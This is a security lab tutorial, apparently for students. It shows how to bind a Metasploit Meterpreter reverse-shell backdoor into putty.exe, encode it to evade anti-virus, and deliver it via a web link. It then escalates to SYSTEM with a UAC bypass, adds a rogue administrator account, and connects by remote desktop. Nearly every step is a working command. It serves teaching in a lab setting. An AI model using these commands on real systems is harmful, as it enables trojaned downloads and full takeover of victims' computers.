ComputerSecurityStudent (CSS) [Login] [Join Now]




|SECURITY TOOLS >> Metasploit >> Current Page |Views: 10631

(Metasploit: Using msfpayload & msfencode)

{ Kali 1.0: msfencode Putty with msfpayload on Windows 7 }


Section 0. Background Information
  1. What is the scenario?
    • Have you ever heard about how a malicious perpetrator placed a virus or backdoor into a game or very common internet utility?  Unfortunately, it is very simple to do so.  The following lab demonstrates how to use msfpayload to create the backdoor and msfencode to (1) bind the backdoor to Putty.exe (or a game) and to (2) possibly evade anti-virus detection.

  2. What is Metasploit?
    • The Metasploit Framework is a open source penetration tool used for developing and executing exploit code against a remote target machine it, Metasploit frame work has the world's largest database of public, tested exploits. In simple words, Metasploit can be used to test the Vulnerability of computer systems in order to protect them and on the other hand it can also be used to break into remote systems.

  3. What is mfspayload?
    • msfpayload is a command line instance of Metasploit that is used to generate and output all of the various types of shellcode that are available in Metasploit. The most common use of this tool is for the generation of shellcode for an exploit that is not currently in the Metasploit Framework or for testing different types of shellcode and options before finalizing an Exploit Module.

  4. What is msfencode?
    • msfencode is another great little tool in the framework’s arsenal when it comes to exploit development. Most of the time, one cannot simply use shellcode generated straight out of msfpayload. It needs to be encoded to suit the target in order to function properly. This can mean transforming your shellcode into pure alphanumeric, getting rid of bad characters or encoding it for 64 bit target.

  5. What is putty?
    • PuTTY is a free and open-source terminal emulator, serial console and network file transfer application. It supports several network protocols, including SCP, SSH, Telnet, rlogin, and raw socket connection. It can also connect to a serial port (since version 0.59). The name "PuTTY" has no definitive meaning.

  6. Pre-Requisite Lab
    1. Kali: Lesson 1: Installing Kali 1.0
    2. Damn Vulnerable Windows 7: Lesson 1: How to create a Damn Vulnerable Windows 7 Machine
     
  7. Lab Notes
    • In this lab we will do the following:
      1. Download Putty.exe
      2. Create backdoor with msfpayload
      3. Bind backdoor to Putty.exe and encode it with msfencode.
      4. Place the executable on an Apache Web Server
      5. Establish a Metasploit Listener
      6. Use Meterpreter to gain SYSTEM Privileges
      7. Establish a Remote Desktop Connection to Victim Machine.

  8. Legal Disclaimer
    • As a condition of your use of this Web site, you warrant to computersecuritystudent.com that you will not use this Web site for any purpose that is unlawful or that is prohibited by these terms, conditions, and notices.
    • In accordance with UCC § 2-316, this product is provided with "no warranties, either express or implied." The information contained is provided "as-is", with "no guarantee of merchantability."
    • In addition, this is a teaching website that does not condone malicious behavior of any kind.
    • You are on notice, that continuing and/or using this lab outside your "own" test environment is considered malicious and is against the law.
    • © 2015 No content replication of any kind is allowed without express written permission.

 

Section 1: Start your Windows 7 VM
  1. Open VMware Player on your windows machine.
    • Instructions:
      1. Click the Start Button
      2. Type "vmware player" in the search box
      3. Click on VMware Player

     

  2. Edit Virtual Machine Settings
    • Instructions
      1. Click on Damn Vulnerable Windows 7
      2. Click on Edit virtual machine settings

     

  3. Configure CD/DVE(IDE)
    • Instructions:
      1. Select CD/DVD (IDE)
      2. Click on the Use physical drive: radio button
      3. Select Auto detect
    • Note(FYI):
      1. Do not click on the OK Button

     

  4. Configure Network Adapter
    • Instructions:
      1. Select Network Adapter
      2. Click the radio button "NAT: Used to share the host's IP address"
      3. Click the OK button
    • Note(FYI):
      1. We will use NAT instead of bridged, because of multiple VMware Player issues with Windows 7 not acquiring an IP Address when using a Wireless connection.

     

  5. Start Windows 7
    • Instructions
      1. Click on Windows 7
      2. Click on Play virtual machine

     

Section 2: Login to Windows 7
  1. Select Login User
    • Instructions:
      1. Click on Security Student
    • Note(FYI):
      • Security Student does belong to the Administrators group. 

     

  2. Switch User
    • Instructions:
      1. Supply the student password (abc123).
      2. Click on the arrow

     

Section 3: Verify you have a Network IP Address
  1. Bring up Command Prompt
    • Instructions:
      1. Click the Windows Start Button
      2. Type cmd in the search box
      3. Click on cmd

     

  2. Record IP Address
    • Instructions:
      1. ipconfig
      2. Record your IP Address
    • Notes(FYI):
      1. In my case, my IP Address is 192.168.121.167.
      2. In your case, your IP Address will probably be different.

 

Section 4: Display User Details
  1. Display User Details (On Damn Vulnerable Windows 7)
    • Instructions:
      1. net users student
    • Notes(FYI):
      • Command #1, the net users command display the details of the student username.  Notice the student user belongs to the the Administrators group.

 

Section 5: Configure Kali Virtual Machine Settings
  1. Open VMware Player on your windows machine.
    • Instructions:
      1. Click the Start Button
      2. Type "vmware player" in the search box
      3. Click on VMware Player

     

  2. Edit Virtual Machine Settings
    • Instructions:
      1. Click on Kali
      2. Edit Virtual Machine Settings
    • Note:
      • Before beginning a lesson it is necessary to check the following VM settings.

     

  3. Configure CD/DVD
    • Instructions:
      1. Click on CD/DVD (IDE)
      2. Click on the radio button "Use physical drive:"
      3. Select Auto detect

     

  4. Set Network Adapter
    • Instructions:
      1. Click on Network Adapter
      2. Click the radio button "NAT: Used to share the host's IP Address"
      3. Click the OK Button

 

Section 6: Play and Login to Kali
  1. Start Up Kali
    • Instructions:
      1. Click on Kali
      2. Play virtual machine

     

  2. Supply Username
    • Instructions:
      1. Click Other...
      2. Username: root
      3. Click the Log In Button

     

  3. Supply Password
    • Instructions:
      1. Password: <Provide you Kali root password>
      2. Click the Log In Button

     

  4. Open a Terminal Window
    • Instructions:
      1. Click on Applications
      2. Accessories --> Terminal

     

  5. Obtain Kali's IP Address
    • Instructions:
      1. ifconfig
      2. Record your IP Address
    • Note(FYI):
      • Command #1, Is used to display Kali's IP Address.
      • Command #2, Record Your IP Address. 
        • Mine is 192.168.121.158
        • Your will probably be different.

 

Section 7: Start The Apache Web Server
  1. Start Apache
    • Instructions:
      1. cd /etc/init.d
      2. ./apache2 start
      3. ps -eaf | grep -v grep | grep apache
    • Notes(FYI):
      • Command #1, change directory to the /etc/init.d directory.
      • Command #2, start the apache web server.
      • Command #3, Show all process (ps -eaf); Ignore the actual grep process (| grep -v grep); and display only apache processes (| grep apache).

 

Section 8: Create msfpayload Backdoor
  1. Download Putty
    • Instructions:
      1. cd /var/www
      2. wget http://www.computersecuritystudent.com/SECURITY_TOOLS/Metasploit/lesson17/putty.exe
      3. ls -l putty.exe

     

  2. Create the msfpayload
    • Notes(FYI):
      • Replace (192.168.121.158)with your Kali IP Address.
    • Instructions:
      1. cp putty.exe /usr/share/metasploit-framework/data/templates/
      2. msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.121.158 LPORT=4444 R | msfencode -t exe -x putty.exe -k -o bad_putty.exe -e x86/shikata_ga_nai -c 3
      3. chmod 744 /var/www/bad_putty.exe
      4. ls -lrta | grep putty
    • Notes(FYI):
      • Command #1, Executables, like putty.exe, must be copied to the templates directory in order to encode it with msfencode.
      • Command #2, Create a reverse_tcp payload backdoor using msfpayload to connect back to Kali (LHOST=192.168.121.158) using port (LPORT=4444). Use msfencode to bind the reverse_tcp payload backdoor to putty.exe.  Use 3 interations of shikata_ga_nai encoding to perhaps bypass an Anti-Virus it one existed on the machine.
      • Command #3, Make bad_putty executable.
      • Command #4, List both the putty executables.

 

Section 9: Start msfconsole and listener
  1. Start A Typescript
    • Instructions:
      1. script msfconsole_putty.txt
    • Notes(FYI):
      • Command #1, Makes a typescript of terminal session. It is
        useful for students who need a hardcopy record of an interactive session as proof of an assignment.  Basically all input and output will be stored in the file msfconsole_putty.txt.

     

  2. Start msfconsole
    • Instructions:
      1. msfconsole
    • Note(FYI):
      1. Command #1, The msfconsole provides an “all-in-one” centralized console and allows you efficient access to virtually all of the options available in the MSF.

     

  3. Start Exploit listener
    • Notes(FYI):
      • Replace (192.168.121.158) with Kali's IP address obtain from [Section 6, Step 5].
    • Instructions:
      1. use exploit/multi/handler
      2. set PAYLOAD windows/meterpreter/reverse_tcp
      3. set LHOST 192.168.121.158
      4. set LPORT 4444
      5. exploit
      6. Continue to the next step

 

Section 10: Start Internet Explorer
  1. Start Internet Explorer (On the Window's 7 VM)
    • Instructions:
      1. Click the Windows Start Button
      2. Type Internet Explorer in the search box
      3. Click Internet Explorer

     

  2. Run Putty
    • Notes(FYI):
      • Replace (192.168.121.158) with Kali's IP address obtain from [Section 6, Step 5].
    • Instructions:
      1. Place the following link in the Address Bar
        • http://192.168.121.158/bad_putty.exe
      2. Click the Run Button
    • Notes(FYI):
      1. This is where the social engineering could take place.  Imagine a scenario where you get an email from a friend, with an embedded link that says click the new Putty or game.

     

  3. Internet Explorer - Security Warning
    • Instructions:
      1. Click Run
      2. Continue to Next Section
    • Notes(FYI):
      1. Notice this is a "Internet Explorer - Security Warning", which is not tripping the Windows Firewall.

     

  4. Putty Looks Normal
    • Instructions:
      1. Continue to Next Section

     

Section 11: Meterpreter Reconnaissance 
  1. Get System Information (On the Kali VM)
    • Instructions:
      1. Notice the Meterpreter connection between the Kali and Damn Vulnerable Windows 7 Virtual Machines
      2. sysinfo
    • Note(FYI):
      • Command #2, sysinfo consists of the following: Computer Name, Operating System, Hardware Architecture, and System Language.

     

  2. Get UserID
    • Instructions:
      1. getuid
    • Note(FYI):
      • Command #1, getuid provides the username.

     

  3. Command Prompt
    • Instructions:
      1. shell
      2. echo %username%
    • Note(FYI):
      • Command #1, Access the Windows Console Terminal.
      • Command #2, Display the username.

     

  4. Display Users
    • Instructions:
      1. net users
    • Note(FYI):
      • Command #1, The Net User is a command-line tool that can help system administrators to view, add or modify user accounts.

     

  5. Display Username (student) Details
    • Instructions:
      1. net users student
    • Note(FYI):
      • Command #1, Display the details of the student user account.  Notice that student is part of the Administrators group.

     

  6. Account Creation Attempt
    • Instructions:
      1. net users jhacker abc123 /ADD /FULLNAME:"Johnny Hacker"
      2. View Access denied message.
      3. exit
    • Note(FYI):
      • Command #1, try to create an account (jhacker) with password (abc123) with the name of (Johnny Hacker). 
      • Notice, that even though the student user account belongs to the Administrator group, this account does not the ability to create or modify accounts.  The next steps will show you how to escalate the Windows 7 User Access Control (UAC).
      • Command #3, exit the Command Prompt.

 

Section 12: Escalate User Privilege 
  1. Viewing Sessions
    • Instructions:
      1. background
      2. sessions -l
        • "l" as in lamb.
    • Note(FYI):
      • Command #1, Using the background command places the current session into the background and brings us back to the Metasploit console without terminating the session.
      • Command #2, sessions -l, allow a user to view all the established meterpreter sessions.

     

  2. Send UAC Bypass
    • Instructions:
      1. use exploit/windows/local/bypassuac
      2. show options
      3. set SESSION 1
        • "1" as in the number one.
      4. exploit
      5. Notice the stage being sent and creation of a new meterpreter connection.
    • Note(FYI):
      • Command #1, This is a post-exploitation module that Escalates the UAC (User Account Control) Protection Bypass.
      • Command #2, Show options.  Notice the SESSION variable needs to be set.
      • Command #3, Set the SESSION variable to Meterpreter session 1.
      • Command #4, Exploit away.

     

  3. Get SYSTEM
    • Instructions:
      1. getuid
      2. getsystem
      3. getuid
    • Note(FYI):
      • Command #1, getuid provides the username.  Notice the username is student.
      • Command #2, The 'getsystem' command allows you to escalate the current session to the SYSTEM account from an administrator user account.  This is why your general user account should not have administrative privileges.
      • Command #3, Notice the username is now SYSTEM, which has Administrator privileges.

     

  4. Create User / Add to Administrators Group
    • Instructions:
      1. shell
      2. net users jhacker abc123 /ADD /FULLNAME:"YOUR NAME"
        • Replace (YOUR NAME) with your actual name.
      3. net localgroup Administrators jhacker /ADD
    • Note(FYI):
      1. Command #1, From the Meterpreter prompt, drop down into a Windows Terminal Console.
      2. Command #2, Create a new user (jhacker), set the password (abc123); and Supply the FULLNAME(YOUR NAME).  Remember to use Your Name.
      3. Command #3, Add new user (jhacker) to the Administrators group.

     

  5. View Administrators Group
    • Instructions:
      1. net localgroup Administrators
    • Note(FYI):
      1. Command #1, Display all users that belong to the Administrators group.  Notice that jhacker is now a part of that group.

     

  6. View User Details
    • Instructions:
      1. net users jhacker
    • Note(FYI):
      1. Command #1, Display the user (jhacker) details.  You should see your name on the "Full Name" line.  Also, jhacker should belong to the Administrators group.

     

  7. Exit Metasploit Framework
    • Instructions:
      1. exit
        • Exit Windows Console Terminal
      2. exit -y
        • Exit Meterpreter Session 2
      3. exit -y
        • Exit Meterpreter Shell
      4. exit
        • Exit Type Script

 

Section 13: Remote Login into Damn Vulnerable Windows 7
  1. Open a Terminal Window (On Kali)
    • Instructions:
      1. Click on Applications
      2. Accessories --> Terminal

     

  2. Remote Desktop
    • Note(FYI):
      • Replace 192.168.121.167 with the IP Address of Damn Vulnerable Windows 7 obtained from [Section 6, Step 5].
    • Instructions:
      1. rdesktop -u jhacker -p abc123 192.168.121.167 -g 80%
    • Note(FYI):
      • Command #1, Use the Remote Desktop Client (rdesktop) to connect to Damn Vulnerable Windows 7.

     

  3. Login Message
    • Instructions:
      1. Click the Yes Button
    • Note(FYI):
      • Since student is already logged in, this message is basically stating that the student account will be disconnected to allow jhacker to login.

     

  4. Disconnecting the student account
    • Note(FYI):
      • The screen will disappear once the student account is disconnected.

     

  5. Preparing Desktop
    • Note(FYI):
      • The jhacker desktop is being prepared since this is the first login.

     

  6. Viewing Your Remote Desktop Connection
    • Note(FYI):
      • Now you have the GUI ability to navigate the Damn Vulnerable Windows 7 VM, using a Remote Desktop Connection from your Kali VM.
      • Pretty KooL stuff.

 

Section 14: Proof of Lab
  1. Open a Terminal Window (On Kali)
    • Instructions:
      1. Click on Applications
      2. Accessories --> Terminal

     

  2. Proof of Lab (Basic Process Forensics)
    • Instructions:
      1. cd /var/www
      2. strings msfconsole_putty.txt | grep "Meterpreter session 2"
      3. strings msfconsole_putty.txt | grep "Full Name"
      4. date
      5. echo "Your Name"
        • Replace the string "Your Name" with your actual name.
        • e.g., echo "John Gray"
    • Note(FYI):
      • Command #1, Change directory to /var/www.
      • Command #2, Use the command (strings) to display print characters of file (msfconsole_putty.txt) and search (grep) for the string (Meterpreter session 2).
      • Command #3, Use the command (strings) to display print characters of file (msfconsole_putty.txt) and search (grep) for the string (Full Name).
    • Proof of Lab Instructions:
      1. Do a PrtScn
      2. Paste into a word document
      3. Upload to Moodle

     



Help ComputerSecurityStudent
pay for continued research,
resources & bandwidth